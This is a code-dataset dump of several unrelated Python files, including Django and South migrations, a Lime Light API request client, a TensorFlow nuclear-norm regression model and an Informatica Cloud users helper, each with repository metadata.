class Migration(migrations.Migration):
dependencies = [
('app', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Course',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('image', models.CharField(max_length=1000)),
('description', models.CharField(max_length=9999)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('teachers', models.ManyToManyField(to='app.Teacher')),
],
),
migrations.CreateModel(
name='Lesson',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=250)),
('description', models.CharField(max_length=9999)),
('ccreated_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('course', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='app.course')),
],
),
]
| 39.342105
| 119
| 0.58194
|
28ac893f00def96e9f2b904a648ac150c6dc31ec
| 20,085
|
py
|
Python
|
avocado/south_migrations/0036_initialize_indexable.py
|
rysdyk/avocado
|
655c1a766be616cb1357ddff8bc345ab61ae9e8a
|
[
"BSD-2-Clause"
] | null | null | null |
avocado/south_migrations/0036_initialize_indexable.py
|
rysdyk/avocado
|
655c1a766be616cb1357ddff8bc345ab61ae9e8a
|
[
"BSD-2-Clause"
] | null | null | null |
avocado/south_migrations/0036_initialize_indexable.py
|
rysdyk/avocado
|
655c1a766be616cb1357ddff8bc345ab61ae9e8a
|
[
"BSD-2-Clause"
] | 2
|
2020-01-13T20:40:09.000Z
|
2020-01-16T15:26:11.000Z
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
from avocado.models import DataField
class Migration(DataMigration):
def forwards(self, orm):
for field in DataField.objects.all():
field.indexable = field.enumerable or field.searchable
field.save()
def backwards(self, orm):
# There is nothing to do here because the indexable field should not
# modify enumerable or searchable even though those are used to
# initially set indexable.
pass
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'avocado.datacategory': {
'Meta': {'ordering': "('parent__order', 'parent__name', 'order', 'name')", 'object_name': 'DataCategory'},
'archived': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keywords': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'order': ('django.db.models.fields.FloatField', [], {'null': 'True', 'db_column': "'_order'", 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': u"orm['avocado.DataCategory']"}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'avocado.dataconcept': {
'Meta': {'ordering': "('category__order', 'category__name', 'order', 'name')", 'object_name': 'DataConcept'},
'archived': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['avocado.DataCategory']", 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'fields': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'concepts'", 'symmetrical': 'False', 'through': u"orm['avocado.DataConceptField']", 'to': u"orm['avocado.DataField']"}),
'formatter_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'concepts+'", 'null': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'indexable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'internal': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'keywords': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'name_plural': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'order': ('django.db.models.fields.FloatField', [], {'null': 'True', 'db_column': "'_order'", 'blank': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'queryable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'concepts+'", 'blank': 'True', 'to': u"orm['sites.Site']"}),
'sortable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'viewable': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
u'avocado.dataconceptfield': {
'Meta': {'ordering': "('order', 'name')", 'object_name': 'DataConceptField'},
'concept': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'concept_fields'", 'to': "orm['avocado.DataConcept']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'field': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'concept_fields'", 'to': u"orm['avocado.DataField']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name_plural': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'order': ('django.db.models.fields.FloatField', [], {'null': 'True', 'db_column': "'_order'", 'blank': 'True'})
},
u'avocado.datacontext': {
'Meta': {'object_name': 'DataContext'},
'accessed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 9, 19, 0, 0)'}),
'count': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'db_column': "'_count'"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'json': ('jsonfield.fields.JSONField', [], {'default': '{}', 'null': 'True', 'blank': 'True'}),
'keywords': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'forks'", 'null': 'True', 'to': u"orm['avocado.DataContext']"}),
'session': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'session_key': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True', 'blank': 'True'}),
'template': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'tree': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'datacontext+'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'avocado.datafield': {
'Meta': {'ordering': "('category__order', 'category__name', 'order', 'name')", 'unique_together': "(('app_name', 'model_name', 'field_name'),)", 'object_name': 'DataField'},
'app_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'archived': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['avocado.DataCategory']", 'null': 'True', 'blank': 'True'}),
'code_field_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'data_version': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'enumerable': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'field_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'fields+'", 'null': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'indexable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'internal': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'keywords': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'label_field_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'model_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'name_plural': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'order': ('django.db.models.fields.FloatField', [], {'null': 'True', 'db_column': "'_order'", 'blank': 'True'}),
'order_field_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'search_field_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'fields+'", 'blank': 'True', 'to': u"orm['sites.Site']"}),
'translator': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'unit': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'unit_plural': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True', 'blank': 'True'})
},
u'avocado.dataquery': {
'Meta': {'object_name': 'DataQuery'},
'accessed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'context_json': ('jsonfield.fields.JSONField', [], {'default': '{}', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'distinct_count': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keywords': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'forks'", 'null': 'True', 'to': u"orm['avocado.DataQuery']"}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'record_count': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'session': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'session_key': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True', 'blank': 'True'}),
'shared_users': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'shareddataquery+'", 'symmetrical': 'False', 'to': u"orm['auth.User']"}),
'template': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'tree': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'dataquery+'", 'null': 'True', 'to': u"orm['auth.User']"}),
'view_json': ('jsonfield.fields.JSONField', [], {'default': '{}', 'null': 'True', 'blank': 'True'})
},
u'avocado.dataview': {
'Meta': {'object_name': 'DataView'},
'accessed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 9, 19, 0, 0)'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'json': ('jsonfield.fields.JSONField', [], {'default': '{}', 'null': 'True', 'blank': 'True'}),
'keywords': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'forks'", 'null': 'True', 'to': u"orm['avocado.DataView']"}),
'session': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'session_key': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True', 'blank': 'True'}),
'template': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'dataview+'", 'null': 'True', 'to': u"orm['auth.User']"})
},
'avocado.revision': {
'Meta': {'ordering': "('-timestamp',)", 'object_name': 'Revision'},
'changes': ('jsonfield.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
'data': ('jsonfield.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'session_key': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True', 'blank': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'+revision'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['avocado']
symmetrical = True
| 91.712329
| 216
| 0.561364
|
75bc51cd9904221aae5638bda7cbf32c8d2b8ea9
| 6,318
|
py
|
Python
|
limelight/request.py
|
zulumarketing/python-limelight
|
72154f2c79d8a2475121624432f7533410cea486
|
[
"MIT"
] | 1
|
2015-01-11T16:51:33.000Z
|
2015-01-11T16:51:33.000Z
|
limelight/request.py
|
zulumarketing/python-limelight
|
72154f2c79d8a2475121624432f7533410cea486
|
[
"MIT"
] | null | null | null |
limelight/request.py
|
zulumarketing/python-limelight
|
72154f2c79d8a2475121624432f7533410cea486
|
[
"MIT"
] | 1
|
2018-03-04T21:42:10.000Z
|
2018-03-04T21:42:10.000Z
|
# -*- coding: utf-8 -*-
from copy import copy
try:
# noinspection PyCompatibility
from urllib.parse import parse_qs
except ImportError:
# noinspection PyUnresolvedReferences,PyCompatibility
from urlparse import parse_qs
from requests import post, get, ConnectionError, Timeout
from requests.packages.urllib3.exceptions import ProtocolError
from voluptuous import Schema, MultipleInvalid
from . import utils, errors
class Request(object):
"""
The superclass of all Lime Light API methods.
"""
TIMEOUT = 12
MAX_TRIES = 3
VERIFY_CERT = True
preserve_field_labels = None
http_method = 'POST'
schema = utils.not_implemented
endpoint = utils.not_implemented
error = utils.not_implemented
handle_errors = utils.func_not_implemented
def __init__(self, host=None, username=None, password=None, **kwargs):
self.host = host
self.username = username
self.password = password
if kwargs.get('http_method'):
self.http_method = kwargs['http_method']
try:
cleaned_data = Schema(self.schema)(kwargs)
except MultipleInvalid as e:
raise errors.ValidationError(e)
preprocessed_data = self.__preprocess_data(cleaned_data)
self.response = self.__make_request(preprocessed_data)
self.__process_response()
self.__handle_errors()
def __preprocess_data(self, unprocessed_data):
"""
:param unprocessed_data: Data that is about to be send to Lime Light
:type unprocessed_data: dict
:return: Data ready to be transmitted
:rtype: dict
"""
if unprocessed_data.get('tran_type') and unprocessed_data.get('cvv'):
unprocessed_data['CVV'] = unprocessed_data.pop('cvv')
if self.preserve_field_labels is not None:
data = {}
for key, value in unprocessed_data.items():
if key in self.preserve_field_labels:
data[key] = value
else:
data[utils.to_camel_case(key)] = value
else:
data = copy(unprocessed_data)
data.update(method=self.__name__,
username=self.username,
password=self.password)
return data
def __make_request(self, request_data, tried=0):
"""
:param request_data: Data being sent over to Lime Light
:type request_data: dict
:param tried: The number of times the request has been tried so far. By default,
``__make_request`` will attempt a request three times before giving up
:type tried: int
:return: Lime Light's response
:rtype: requests.Response
:raises: limelight.errors.ConnectionError
"""
try:
if self.http_method.upper() == 'POST':
return post(self.endpoint, data=request_data, timeout=self.TIMEOUT,
verify=self.VERIFY_CERT)
elif self.http_method.upper() == 'GET':
return get(self.endpoint, params=request_data, timeout=self.TIMEOUT,
verify=self.VERIFY_CERT)
else:
msg = '`{cls}.http_method` must be one of `GET` or `POST`'.format(cls=self.__name__)
raise errors.ImproperlyConfigured(msg)
except (Timeout, ConnectionError, ProtocolError) as e:
if tried <= self.MAX_TRIES:
return self.__make_request(request_data, tried=tried + 1)
else:
raise errors.ConnectionError(e)
def __process_response(self):
"""
:rtype: None
"""
try:
response_data = self.response.json()
except ValueError:
response_data = parse_qs(self.response.text)
for key, value in response_data.items():
setattr(self, utils.to_underscore(key), utils.to_python(value))
# noinspection PyUnresolvedReferences
def __handle_errors(self):
"""Handles generic Lime Light errors"""
try:
self.handle_errors()
except (AttributeError, NotImplementedError):
if self.error_found:
response_code = getattr(self, 'response_code', '000')
error_message = getattr(self, 'error_message',
'An unspecified error occurred, try again.')
raise errors.LimeLightException("{code}: {message}".format(code=response_code,
message=error_message),
response=self)
class TransactionMethod(Request):
"""
Superclass of all Transaction API methods
"""
Declined = errors.TransactionDeclined
preserve_field_labels = {'click_id', 'preserve_force_gateway', 'thm_session_id',
'total_installments', 'alt_pay_token', 'alt_pay_payer_id',
'force_subscription_cycle', 'recurring_days', 'subscription_week',
'subscription_day', 'master_order_id', 'temp_customer_id',
'auth_amount', 'cascade_enabled', 'save_customer', }
def __init__(self, **kwargs):
if self.__name__ != 'NewProspect':
kwargs['tran_type'] = 'Sale'
super(TransactionMethod, self).__init__(**kwargs)
# noinspection PyUnresolvedReferences
def handle_errors(self):
"""
Raises exceptions for Transaction API-related errors.
:return:
"""
if self.error_found:
if self.response_code == 800:
raise self.Declined(self.decline_reason,
response=self)
else:
pass
@property
def endpoint(self):
"""
:return: API endpoint
:rtype: str
"""
return "https://{host}/admin/transact.php".format(host=self.host)
class MembershipMethod(Request):
"""
Superclass of all Membership API methods
"""
@property
def endpoint(self):
"""
:return: API endpoint
:rtype: str
"""
return "https://{host}/admin/membership.php".format(host=self.host)
| 36.310345
| 100
| 0.591168
|
8bfcfbc5b00bd1fe1723918ddeefb1d20c6eb27d
| 1,095
|
py
|
Python
|
orchestrator/__init__.py
|
florisie/orchestrator-core
|
7a5a997fc809cdf53dc942d1ee1fa945de4eb4d8
|
[
"Apache-2.0"
] | null | null | null |
orchestrator/__init__.py
|
florisie/orchestrator-core
|
7a5a997fc809cdf53dc942d1ee1fa945de4eb4d8
|
[
"Apache-2.0"
] | null | null | null |
orchestrator/__init__.py
|
florisie/orchestrator-core
|
7a5a997fc809cdf53dc942d1ee1fa945de4eb4d8
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019-2020 SURF.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This is the orchestrator workflow engine."""
__version__ = "0.3.4"
from orchestrator.app import OrchestratorCore
from orchestrator.settings import app_settings, oauth2_settings
from orchestrator.workflow import begin, conditional, done, focussteps, inputstep, retrystep, step, steplens, workflow
__all__ = [
"OrchestratorCore",
"app_settings",
"oauth2_settings",
"step",
"inputstep",
"workflow",
"retrystep",
"begin",
"done",
"conditional",
"focussteps",
"steplens",
]
| 30.416667
| 118
| 0.730594
|
cc8a48a40eadd9323bd3947adc01d6fbad4d2034
| 122
|
py
|
Python
|
user_profile/urls.py
|
avinashkranjan/CGS-Centralized_Grading_System
|
60d63eb8266668f16258bd99eaef428933ea5ef7
|
[
"CC0-1.0"
] | null | null | null |
user_profile/urls.py
|
avinashkranjan/CGS-Centralized_Grading_System
|
60d63eb8266668f16258bd99eaef428933ea5ef7
|
[
"CC0-1.0"
] | 2
|
2020-09-05T12:29:37.000Z
|
2020-09-06T18:11:37.000Z
|
user_profile/urls.py
|
avinashkranjan/CGS-Centralized_Grading_System
|
60d63eb8266668f16258bd99eaef428933ea5ef7
|
[
"CC0-1.0"
] | 1
|
2020-09-04T17:23:11.000Z
|
2020-09-04T17:23:11.000Z
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.profile_view, name="profile_page"),
]
| 20.333333
| 54
| 0.713115
|
2e960f330785dc234e705ead1ad7117067078cfa
| 2,759
|
py
|
Python
|
utils/models/nuclear_models.py
|
diptanshumittal/FCO-ICML21
|
4a9f4456cb7e1c3a0646c9b91a0926ba87fc6a48
|
[
"Apache-2.0"
] | 4
|
2021-06-07T18:34:52.000Z
|
2021-10-05T13:20:16.000Z
|
utils/models/nuclear_models.py
|
diptanshumittal/FCO-ICML21
|
4a9f4456cb7e1c3a0646c9b91a0926ba87fc6a48
|
[
"Apache-2.0"
] | null | null | null |
utils/models/nuclear_models.py
|
diptanshumittal/FCO-ICML21
|
4a9f4456cb7e1c3a0646c9b91a0926ba87fc6a48
|
[
"Apache-2.0"
] | 4
|
2021-12-20T18:40:31.000Z
|
2022-03-24T12:28:08.000Z
|
# Copyright 2021, Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Build a model for nuclear-regularized Least-Squares Regression."""
# from abc import abstractmethod
import tensorflow as tf
from optimization.shared import projector_utils
class NuclearDense(tf.keras.layers.Dense):
# this is not functional in TFF... from_keras_model won't accept subclass model
def __init__(self, units, n_row, rank_real=None, nnz_cutoff=1e-4, lambd=0.0, **kwargs):
# n_col = n_row for simplicity
self.n_row = n_row
self.lambd = lambd
self.rank_real = rank_real
self.nnz_cutoff = nnz_cutoff
super(NuclearDense, self).__init__(units, **kwargs)
def call(self, inputs, training=None):
if not training:
kernel_matrix = tf.reshape(self.kernel, (self.n_row, self.n_row))
singular_vals, _, _ = tf.linalg.svd(kernel_matrix)
nuc = tf.reduce_sum(singular_vals)
reg_loss = self.lambd * nuc
rank = tf.math.count_nonzero(singular_vals > self.nnz_cutoff)
self.add_metric(nuc, name=self.name+'_nuc', aggregation = 'mean')
self.add_metric(reg_loss, name=self.name+'_reg_loss', aggregation='mean')
self.add_metric(tf.cast(rank,tf.float32), name='rank', aggregation='mean')
if self.rank_real is not None:
ground_truth = tf.linalg.diag(
[1.0]*self.rank_real+[0.0]*(self.n_row-self.rank_real))
err_fro = tf.norm(ground_truth-kernel_matrix)
# need aggregation due to https://github.com/tensorflow/tensorflow/blob/v2.3.0/tensorflow/python/keras/engine/base_layer_v1.py#L1896
self.add_metric(err_fro, name='err_fro', aggregation='mean')
return super(NuclearDense, self).call(inputs)
def create_nuclear_model(n_row, rank_real=None, nnz_cutoff=1e-4):
"""Create a Least Squares Base Model (for federated) with nuclear regularization
Args:
use_bias: A boolean that determines whether to use bias for the Logistic linear.
Returns:
A `tf.keras.Model`.
"""
model = tf.keras.models.Sequential([
NuclearDense(1,
name='dense',
input_shape=(n_row*n_row,),
n_row = n_row,
rank_real=rank_real,
nnz_cutoff=nnz_cutoff,
**(projector_utils.get_lambd()))
])
return model
| 36.302632
| 140
| 0.707865
|
e3acb892793f78b2c48269ad99f0d51ec6234dac
| 160
|
py
|
Python
|
popupdict/speech/client/__init__.py
|
hantaotaohan/popup-dict
|
9eb05fd9797a14323c9b1166f916778b32e933bc
|
[
"MIT"
] | 85
|
2018-02-23T07:16:27.000Z
|
2022-03-26T19:53:48.000Z
|
popupdict/speech/client/__init__.py
|
glMa7/popup-dict
|
dbf9121aa63d65095bd848a582595e1b03327418
|
[
"MIT"
] | 12
|
2018-02-23T07:45:34.000Z
|
2020-03-10T03:20:03.000Z
|
popupdict/speech/client/__init__.py
|
glMa7/popup-dict
|
dbf9121aa63d65095bd848a582595e1b03327418
|
[
"MIT"
] | 16
|
2018-01-02T02:07:50.000Z
|
2021-12-17T08:01:00.000Z
|
from .youdao import YoudaoSpeechClient
valid_speech_clients = [
YoudaoSpeechClient,
]
__all__ = [
'valid_speech_clients',
'YoudaoSpeechClient',
]
| 14.545455
| 38
| 0.73125
|
3936c00edc4ee840c1f8ddaffbd26684fe995d81
| 4,673
|
py
|
Python
|
build/lib/infapy/v3/users.py
|
infapy/infapy
|
0cb11310130be70ce1b647aa5ede929c1eb9b2ce
|
[
"Apache-2.0"
] | null | null | null |
build/lib/infapy/v3/users.py
|
infapy/infapy
|
0cb11310130be70ce1b647aa5ede929c1eb9b2ce
|
[
"Apache-2.0"
] | null | null | null |
build/lib/infapy/v3/users.py
|
infapy/infapy
|
0cb11310130be70ce1b647aa5ede929c1eb9b2ce
|
[
"Apache-2.0"
] | 1
|
2021-09-23T10:31:56.000Z
|
2021-09-23T10:31:56.000Z
|
import infapy
import requests as re
from infapy.exceptions import InvalidUserDetailsProvided
class Users:
def __init__(self,v3,v3BaseURL,v3SessionID):
self._v3 = v3
self._v3BaseURL = v3BaseURL
self._v3SessionID = v3SessionID
def getAllUsers(self):
"""getAllUsers can be used to fetch all the user details in you iics org
Returns:
infaUserData: <list of dict>
"""
infapy.log.info("getting all user details. Processing request....")
